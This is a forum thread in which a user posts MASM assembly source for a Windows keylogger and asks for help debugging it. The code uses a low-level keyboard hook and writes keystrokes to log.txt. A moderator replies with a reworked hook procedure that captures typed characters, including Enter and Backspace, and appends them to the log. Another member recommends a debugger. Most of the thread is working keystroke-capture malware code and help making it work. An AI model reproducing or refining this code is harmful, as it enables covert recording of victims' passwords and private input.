ASM Keylogger need help, the strange thing is when I'm invoking WriteFile in the WndProc procedure my keylogger works fine, but only gets CHAR from window

polishgang
New Member
Group: Members
Posts: 4
Member No.: 25083
Joined: 3-August 09

Hello guys, I've got a problem with my keylogger. It only logs big letters and does not log the key ENTER. The strange thing is, when I'm invoking WriteFile in the WndProc procedure my keylogger works fine, but it only gets CHAR from my window.... This is the Keyboard Proc: http://msdn.microsoft.com/en-us/library/ms644984%28VS.85%29.aspx I don't know where the problem is. Sorry for my English and CODE. Here is my code.. hope someone can help me. Thx a lot

CODE |
; Author Polish-Gangsta|Dawid
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include gdi32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
includelib gdi32.lib

WinMain proto :DWORD,:DWORD,:DWORD,:DWORD

.const
MEMSIZE equ 65535

.DATA
ClassName        db "Radonia4ever",0
AppName          db "PG greets Polska",0
dateiname        db "log.txt",0
tastaturEingaben db "Dawid",0
zeilenumbruch    WORD 0A0Dh

.DATA?
hInstance     HINSTANCE ?
CommandLine   LPSTR ?
hFile         HANDLE ?
hMemory       HANDLE ?
pMemory       DWORD ?
SizeReadWrite DWORD ?

.CODE
start:
    invoke GetModuleHandle, NULL
    mov hInstance,eax
    mov hInstance,eax
    invoke GetCommandLine
    mov CommandLine,eax
    invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
    invoke ExitProcess, eax

KeyBoard proc nCode:DWORD, wParam:DWORD, lParam:DWORD
    mov eax, wParam
    cmp eax, WM_KEYUP          ; only need WM_KEYDOWN
    je  next_hook
    cmp eax, WM_SYSKEYUP       ; only need WM_SYSKEYDOWN
    je  next_hook
    invoke MessageBoxEx,nCode,ebx,ebx,MB_OK,LANG_GERMAN
    invoke SetFilePointer,hFile,0,0,FILE_END
    .IF wParam==13
        invoke WriteFile,hFile,ADDR zeilenumbruch,sizeOf zeilenumbruch,ADDR SizeReadWrite,0
    .ELSE
        invoke WriteFile,hFile,ebx,1,ADDR SizeReadWrite,0
    .ENDIF
    ;invoke MessageBoxEx,nCode,edi,edi,MB_OK,LANG_GERMAN
next_hook:
    invoke CallNextHookEx,KeyBoard,nCode,wParam,lParam
    ret
KeyBoard endp

WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
    LOCAL wc:WNDCLASSEX
    LOCAL msg:MSG
    LOCAL hwnd:HWND

    ; load file
    invoke CreateFile,ADDR dateiname,\
                      GENERIC_WRITE,\
                      FILE_SHARE_WRITE,\
                      NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,\
                      NULL
    mov hFile,eax
    ;invoke SetEndOfFile,hFile

    invoke SetWindowsHookEx,WH_KEYBOARD_LL,addr KeyBoard,hInst,NULL ; register hook

    mov wc.cbSize,SIZEOF WNDCLASSEX
    mov wc.style, CS_HREDRAW or CS_VREDRAW
    mov wc.lpfnWndProc, OFFSET WndProc
    mov wc.cbClsExtra,NULL
    mov wc.cbWndExtra,NULL
    push hInstance
    pop wc.hInstance
    mov wc.hbrBackground,COLOR_WINDOW+1
    mov wc.lpszMenuName,NULL
    mov wc.lpszClassName,OFFSET ClassName
    invoke LoadIcon,NULL,IDI_APPLICATION
    mov wc.hIcon,eax
    mov wc.hIconSm,eax
    invoke LoadCursor,NULL,IDC_ARROW
    mov wc.hCursor,eax
    invoke RegisterClassEx, addr wc
    invoke CreateWindowEx,NULL,\
                          ADDR ClassName,\
                          ADDR AppName,\
                          WS_OVERLAPPEDWINDOW,\
                          CW_USEDEFAULT,\
                          CW_USEDEFAULT,\
                          CW_USEDEFAULT,\
                          CW_USEDEFAULT,\
                          NULL,\
                          NULL,\
                          hInst,\
                          NULL
    mov hwnd,eax
    invoke ShowWindow, hwnd,CmdShow
    invoke UpdateWindow, hwnd

    .WHILE TRUE
        invoke GetMessage, ADDR msg,NULL,0,0
        .BREAK .IF (!eax)
        invoke TranslateMessage, ADDR msg
        invoke DispatchMessage, ADDR msg
    .ENDW
    mov eax,msg.wParam
    ret
WinMain endp

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
    LOCAL ps:PAINTSTRUCT
    LOCAL hdc:HDC

    .IF uMsg==WM_DESTROY
        invoke UnhookWindowsHookEx,KeyBoard
        invoke PostQuitMessage,NULL
    .ELSEIF uMsg==WM_KEYUP
    .ELSEIF uMsg==WM_PAINT
        invoke BeginPaint,hWnd, ADDR ps
        mov hdc,eax
        invoke TextOut,hdc,0,0,ADDR wParam,sizeOf tastaturEingaben
        invoke EndPaint,hWnd, ADDR ps
    .ELSE
        invoke DefWindowProc,hWnd,uMsg,wParam,lParam ; default message handling
        ret
    .ENDIF
    xor eax,eax
    ret
WndProc endp

invoke CloseHandle,eax
end start
|

ragdog
Extremely Active Member
Group: Moderators
Posts: 891
Member No.: 5019
Joined: 13-May 07

Hi

What makes your ebx?

Here is a simple solution:
CODE |
KbdProc proc nCode:DWORD,wParam:DWORD,lParam:DWORD
    invoke CallNextHookEx,hHook,nCode,wParam,lParam
    mov eax,lParam
    mov ebx,[eax+4]
    .if ebx==WM_CHAR
        invoke CreateFile,ADDR fname,FILE_APPEND_DATA, FILE_SHARE_WRITE or FILE_SHARE_READ,\
                          NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_ARCHIVE ,NULL
        mov fh,eax
        mov ecx,lParam
        add ecx,8          ;; get pointer to ascii code of char
        mov ebx,[ecx]
        mov char,ebx
        and char,0ffh      ;; need first 8 bits
        .if char == 13     ;; enter
            mov char,10
        .elseif char == 8  ;; backspace
            mov char,'~'
        .endif
        invoke WriteFile,fh,addr char,1,ADDR fl,NULL
        invoke CloseHandle,fh
    .endif
    xor eax,eax
    ret
KbdProc endp
|

polishgang
New Member
Group: Members
Posts: 4
Member No.: 25083
Joined: 3-August 09

Thx ragdog for ur post and time!! Nice community, I will study ur code.

------------------------------------

I've tried ur code but it's still the same problem.... the letters are BIG and nothing changed. And I've got 2 questions: how do u know that's the 2nd parameter?

QUOTE | add ecx,8;; get pointer to ascii code of char |

And how do u know this? Thx for the reply.

EnFeR RoI
Member
Group: Members
Posts: 20
Member No.: 30972
Joined: 15-January 10

I think you should use OLLYDBG to understand the working of the code of the keylogger project made by you. Hope it helps you!! EnFeR RoI.